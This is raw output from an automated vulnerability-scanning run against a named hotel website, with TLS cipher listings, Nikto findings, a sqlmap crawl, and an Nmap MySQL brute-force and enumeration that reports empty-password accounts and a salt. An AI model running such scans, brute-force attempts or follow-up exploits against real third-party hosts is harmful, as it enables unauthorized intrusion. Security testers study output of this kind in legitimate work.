- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits SEED-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 128 bits IDEA-CBC-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits RC4-SHA
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits SEED-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 128 bits IDEA-CBC-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits RC4-SHA
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits SEED-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 128 bits IDEA-CBC-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits RC4-SHA
- Preferred Server Cipher(s):
- TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.websitewelcome.com
- Altnames: DNS:*.websitewelcome.com, DNS:websitewelcome.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=Hosted by HostGator.com, LLC./OU=PositiveSSL Wildcard/CN=*.websitewelcome.com
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
- + Start Time: 2015-09-29 14:39:26 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: /404.html
- + Server is using a wildcard certificate: *.websitewelcome.com
- + Hostname 'www.lasdunashotel.com' does not match certificate's names: *.websitewelcome.com
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Argumento inválido
- + Scan terminated: 7 error(s) and 7 item(s) reported on remote host
- + End Time: 2015-09-29 15:05:09 (GMT-4) (1543 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.8
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [!] The WordPress URL supplied 'https://www.lasdunashotel.com/' seems to be down.
- [ERROR] Website Unreachable: https://www.lasdunashotel.com
- _
- ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150928}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 15:05:42
- do you want to check for the existence of site's sitemap(.xml) [y/N] n
- [15:05:42] [INFO] starting crawler
- [15:05:42] [INFO] searching for links with depth 1
- sqlmap got a 302 redirect to 'https://www.lasdunashotel.com:443/404.html'. Do you want to follow? [Y/n] Y
- [15:05:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
- [15:05:44] [INFO] searching for links with depth 2
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:44] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 3
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 4
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 5
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [WARNING] no usable links found (with GET parameters)
- [*] shutting down at 15:05:46
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 15:05 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.017s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 3306/tcp open mysql MySQL 5.5.42-37.1
- | mysql-audit:
- |_ No audit rulebase file was supplied (see mysql-audit.filename)
- | mysql-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 81 guesses in 71 seconds, average tps: 1
- |_ ERROR: Too many retries, aborted ...
- | mysql-enum:
- | Valid usernames:
- | root:<empty> - Valid credentials
- | netadmin:<empty> - Valid credentials
- | guest:<empty> - Valid credentials
- | user:<empty> - Valid credentials
- | web:<empty> - Valid credentials
- | sysadmin:<empty> - Valid credentials
- | administrator:<empty> - Valid credentials
- | webadmin:<empty> - Valid credentials
- | admin:<empty> - Valid credentials
- | test:<empty> - Valid credentials
- |_ Statistics: Performed 10 guesses in 69 seconds, average tps: 0
- | mysql-info:
- | Protocol: 53
- | Version: .5.42-37.1
- | Thread ID: 17373659
- | Capabilities flags: 65535
- | Some Capabilities: ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, FoundRows, SwitchToSSLAfterHandshake, Support41Auth, IgnoreSigpipes, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, DontAllowDatabaseTableColumn
- | Status: Autocommit
- |_ Salt: h.Ic:7D0c##%0bzaXtaf
- |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 74.74 seconds
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.lasdunashotel.com:8080
- Generic Detection results:
- The site http://www.lasdunashotel.com:8080 seems to be behind a WAF
- Reason: The server returned a different response code when a string trigged the blacklist.
- Normal response code is "302", while the response code to an attack is "406"
- Number of requests: 10
- http://www.lasdunashotel.com:8080 [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
- ./sniper: línea 483: xsstracer: no se encontró la orden
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 8080
- + Start Time: 2015-09-29 15:08:07 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.8.0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
- + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + /securecontrolpanel/: Web Server Control Panel
- + /webmail/: Web based mail package installed.
- + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
- + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-2117: /cpanel/: Web-based control panel
- + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
- + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
- + OSVDB-3268: /includes/: Directory indexing found.
- + OSVDB-3092: /includes/: This might be interesting...
- + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
- + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
- + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3268: /images/: Directory indexing found.
- + OSVDB-3268: /style/: Directory indexing found.